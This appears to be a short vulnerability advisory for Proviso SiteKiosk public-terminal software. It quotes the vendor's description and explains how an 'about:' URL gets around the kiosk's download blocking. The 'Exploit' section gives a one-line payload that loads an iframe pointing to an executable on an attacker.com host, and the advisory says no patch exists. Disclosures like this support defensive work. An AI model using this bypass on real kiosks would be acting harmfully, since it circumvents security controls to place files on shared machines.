Proviso SiteKiosk File Download Vulnerability
[>>] Proviso SiteKiosk File Download Vulnerability [<<]
[x] Vendor Information:
"SiteKiosk is a software for public access internet terminals and lets you turn
any computer into a secure multilanguage Internet terminal (already 20
different languages included), allowing the user to access the Internet but
protecting the underlying operating system and files. Possible uses include
presentations, exhibitions, libraries, and more. SiteKiosk works with normal
displays and Touchscreens. A keyboard doesn't even have to be attached -- text
can be entered via a keypad with a mouse. Plentiful options let you decide the
amount of security your kiosk needs, from hard-disk protection to prohibiting
specific Websites. The program can be used with either a direct network
connection or Dial-Up Networking, providing Internet access "on demand." Other
features include multiple-window support, automatic shutdown/restart,
Shell-Replacement, hard-disk protection, thorough event-logging support,
Log-Out Button, content-advisor, great website filtering (with automatic update)
, an easy-to-use configuration wizard, and more. SiteKiosk supports different
payment methods like coin machines, bill acceptors, smart cards and others.
Also very nice is the webcam support which enables users to send voice, video
and photo emails. It is also possible to administer terminals by remote.
SiteKiosk uses Internet Explorer as its basis but presents a much simplified
interface that even the novice user will understand. Excellent online help is
included."
[x] Attack Information
SiteKiosk tries to block and avoid file downloads. If you click on a link which
saves a file automatically on your hard drive (e.g. an exe download link) or if
you right click something and select "save as..." a window will pop up which
says that it isn't possible to download the file. But you can bypass the issue
with a special url - you've got to use the "about:"-url. SiteKiosk uses the
microsoft internet explorer engine to display web sites, so you can also use
"about:" to display anything directloy from the url. For example "about:hello"
will display the text "hello" directly in the browser. Of course you can use
HTML too: "about:<b>hello</b>" will display the text "hello" bold. Normally
this is harmless, but in SiteKiosk you can use it to download files.
[x] Exploit
Just access this url:
about:<iframe src="http://www.attacker.com/file.exe"></iframe>
[x] Patch
None
[x] Credits
The vulnerability has been discovered by katharsis -
www.katharsis.x2.to